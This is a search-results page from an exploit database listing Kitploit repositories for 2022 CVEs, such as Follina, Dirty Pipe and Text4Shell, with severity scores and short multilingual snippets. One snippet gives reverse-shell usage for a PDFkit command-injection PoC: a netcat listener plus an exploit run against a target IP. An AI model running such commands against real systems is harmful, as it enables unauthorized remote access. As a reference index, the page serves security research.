Lucene search
+L

140314 matches found

Kitploit
Kitploit
added 2026/09/19 7:14 a.m.10 views

LetsDefend-SOC173-Follina-0-Day-Detected

LetsDefend-SOC173-Follina-0-Day-Detected We are presented with a security alert indicating the detection of the Follina CVE-2022-30190 vulnerability. A malicious Word document triggered msdt.exe execution, suggesting possible remote code execution on the host JonasPRD. Our task is to investigate...

9.3CVSS8.6AI score0.99234EPSS
SaveExploits63
Kitploit
Kitploit
added 2026/09/19 6:38 a.m.10 views

CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS

致谢 @kevin-mizu https://github.com/kevin-mizu/Werkzeug-CVE-2022-29361-PoC/tree/main 详情请阅读: https://mizu.re/post/abusing-client-side-desync-on-werkzeug 已在基于 Debian trixie/sid 构建、运行于 Debian kali-rolling 的 Chromium 119.0.6045.123 上测试。...

9.8CVSS8.1AI score0.08067EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/19 6:37 a.m.8 views

Debugging_Dirty_Pipe_CVE-2022-0847

此存储库没有 README。...

7.8CVSS7.1AI score0.89721EPSS
SaveExploits102
Kitploit
Kitploit
added 2026/09/19 6:34 a.m.14 views

CVE-2022-32862

このリポジトリには README がありません。...

5.5CVSS7AI score0.00741EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 6:29 a.m.10 views

CVE-2022-1015

Meungmeung is a fool...

6.6CVSS6.7AI score0.01467EPSS
SaveExploits10
Kitploit
Kitploit
added 2026/09/19 6:21 a.m.13 views

exploit-CVE-2022-0482

Easy!Appointments PII disclosure Easy!Appointments --debug exploit.rb -h | --help Options: Root URL base path including HTTP scheme, port and root folder All events since default: 2015-01-11 All events until default: today --debug Display arguments -h, --help Show this screen Examples: exploit.rb...

9.1CVSS8.4AI score0.43746EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/09/19 6:01 a.m.8 views

burp-text4shell

用于 Burp Suite 的 Text4Shell 扫描器 详细说明请参阅我们关于此插件的博客文章。 关于检测能力的说明:该插件只会为内置的主动扫描器提供有效载荷,因此,要获得最佳的覆盖率与性能平衡,您必须正确配置扫描——这与任何其他内置或扩展提供的扫描并无不同。 单问题扫描 如果您只想扫描 CVE-2022-42889(而不扫描 XSS 或 SQLi 等其他内容),该插件即可实现。 按照以下说明操作后,只要使用由此生成的扫描配置,扫描器就只会在所有插入点上执行 Text4Shell 检查。 1. 创建新扫描时,在 Scan configuration 选项卡上点击 Select fr...

9.8CVSS7.7AI score0.99931EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/19 6:01 a.m.6 views

text4shell-tools

commons-text-tools 快速链接 点击查找: 查找 commons-text .jar 文件及其版本 对 commons-text 漏洞函数的调用 对 commons-text .jar 文件进行热补丁以禁用危险行为 扫描与修补示例 概述 CVE-2022-42889 可能对广泛的基于 Java 的应用程序构成严重威胁。开发人员在此时可能会提出的重要问题包括: 1. 我的代码是否包含 commons-text?是哪些版本? 发布的代码是否包含 commons-text?其中包含哪个版本的库?由于两个因素,回答这些问题可能并不直接: 1. 传递性依赖:虽然...

9.8CVSS7.8AI score0.99931EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/19 5:46 a.m.57 views

de4dot

Description de4dot is an open source GPLv3 .NET deobfuscator and unpacker written in C. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored eg. string encryption, but symbol renaming is impossible to...

6.1AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/19 5:44 a.m.10 views

hexacon2022_AppleAVD

此存储库没有 README。...

5.7AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 5:42 a.m.8 views

angularjs-poc-cve-2022-25869

关于 这是一个针对影响 Internet Explorer 的 AngularJS XSS 漏洞的最小概念验证(CVE-2022-25869)。 你可以在 https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869 查看在线演示。...

6.1CVSS7AI score0.07266EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/19 5:14 a.m.7 views

Joomla-CVE-Detector-CVE-2022-27913-

Joomla-CVE-Detector-CVE-2022-27913- 识别受CVE-2022-27913影响的Joomla实例。...

6.1CVSS6.5AI score0.00383EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 5:10 a.m.9 views

CVE-2022-25765

CVE-2022-25765 漏洞利用 针对 CVE-2022-25765(PDFkit 命令注入)的小型 PoC 漏洞利用 使用方法 1. 在攻击机器上启动 netcat 监听器: root@kitploit: nc -lvnp 4444 2. 运行漏洞利用程序: root@kitploit: python cve-2022-25765.py -t http://目标IP:端口 -l 你的IP -p 你的端口 示例: root@kitploit: python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 44...

9.8CVSS8.4AI score0.42961EPSS
SaveExploits12References2
Kitploit
Kitploit
added 2026/09/19 4:43 a.m.9 views

CVE-2022-26134

CVE-2022-26134...

9.8CVSS7.3AI score0.99999EPSS
SaveExploits77
Kitploit
Kitploit
added 2026/09/19 4:42 a.m.9 views

CVE-2022-29170

此存储库没有 README。...

8.5CVSS8AI score0.01209EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 4:41 a.m.10 views

CVE-2022-1040

CVE-2022-1040...

9.8CVSS7.4AI score0.99796EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/19 4:38 a.m.12 views

CVE-2022-29007

CVE-2022-29007...

9.8CVSS8.8AI score0.19253EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/19 4:37 a.m.12 views

CVE-2022-29005

CVE-2022-29005...

6.1CVSS6.1AI score0.02178EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/19 4:37 a.m.9 views

CVE-2022-29004

CVE-2022-29004...

6.1CVSS6AI score0.02944EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/19 4:34 a.m.13 views

CVE-2022-0435

CVE-2022-0435...

9CVSS6.5AI score0.67994EPSS
SaveExploits2
Rows per page
Query Builder